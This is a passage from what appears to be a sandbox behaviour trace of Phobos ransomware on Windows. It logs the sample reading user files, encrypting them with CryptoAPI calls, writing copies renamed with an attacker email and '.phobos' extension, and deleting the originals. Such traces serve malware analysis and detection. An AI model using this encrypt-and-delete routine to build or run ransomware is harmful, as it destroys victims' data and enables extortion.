phKey=0x2e0f904*=0xa32b68) returned 1 [0199.237] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.237] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4cc, lpOverlapped=0x0) returned 1 [0199.251] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0) returned 1 [0199.251] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4d0, lpOverlapped=0x0) returned 1 [0199.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0199.252] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.252] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.252] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.252] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0199.252] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.252] CloseHandle (hObject=0x130) returned 1 [0199.252] CloseHandle (hObject=0x15c) returned 1 [0199.253] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk")) returned 1 [0199.254] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.254] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1547) returned 1 [0199.255] CloseHandle (hObject=0x15c) returned 1 [0199.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk")) returned 0x20 [0199.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.255] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.255] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.256] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.256] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x60b, lpOverlapped=0x0) returned 1 [0199.257] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x610, dwBufLen=0x610 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x610) returned 1 [0199.257] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x610, lpOverlapped=0x0) returned 1 [0199.258] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0199.258] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.258] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0199.258] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.258] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0199.258] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.258] CloseHandle (hObject=0x15c) returned 1 [0199.258] CloseHandle (hObject=0x130) returned 1 [0199.261] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk")) returned 1 [0199.262] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.263] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1547) returned 1 [0199.264] CloseHandle (hObject=0x130) returned 1 [0199.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk")) returned 0x20 [0199.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.264] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.264] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.266] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.266] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.266] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x60b, lpOverlapped=0x0) returned 1 [0199.273] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x610, dwBufLen=0x610 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x610) returned 1 [0199.273] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x610, lpOverlapped=0x0) returned 1 [0199.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.274] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.274] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0199.274] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.274] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0199.274] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.274] CloseHandle (hObject=0x130) returned 1 [0199.274] CloseHandle (hObject=0x15c) returned 1 [0199.275] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk")) returned 1 [0199.276] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.277] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=272) returned 1 [0199.277] CloseHandle (hObject=0x15c) returned 1 [0199.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk")) returned 0x20 [0199.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.278] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.278] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.279] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.279] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.279] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x110, lpOverlapped=0x0) returned 1 [0199.280] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x120, dwBufLen=0x120 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x120) returned 1 [0199.280] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x120, lpOverlapped=0x0) returned 1 [0199.281] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.281] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.281] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.281] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.282] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0199.282] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.283] CloseHandle (hObject=0x15c) returned 1 [0199.283] CloseHandle (hObject=0x130) returned 1 [0199.283] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk")) returned 1 [0199.284] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.286] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=390656) returned 1 [0199.286] CloseHandle (hObject=0x130) returned 1 [0199.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt")) returned 0x2020 [0199.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.287] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.287] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.288] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.288] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.288] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5f600, lpOverlapped=0x0) returned 1 [0199.312] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5f610, dwBufLen=0x5f610 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5f610) returned 1 [0199.315] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5f610, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5f610, lpOverlapped=0x0) returned 1 [0199.323] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0199.323] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.323] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.323] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.323] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.324] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.324] CloseHandle (hObject=0x130) returned 1 [0199.324] CloseHandle (hObject=0x15c) returned 1 [0199.324] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt")) returned 1 [0199.327] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.457] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1434) returned 1 [0199.457] CloseHandle (hObject=0x15c) returned 1 [0199.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk")) returned 0x2020 [0199.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.457] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.457] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 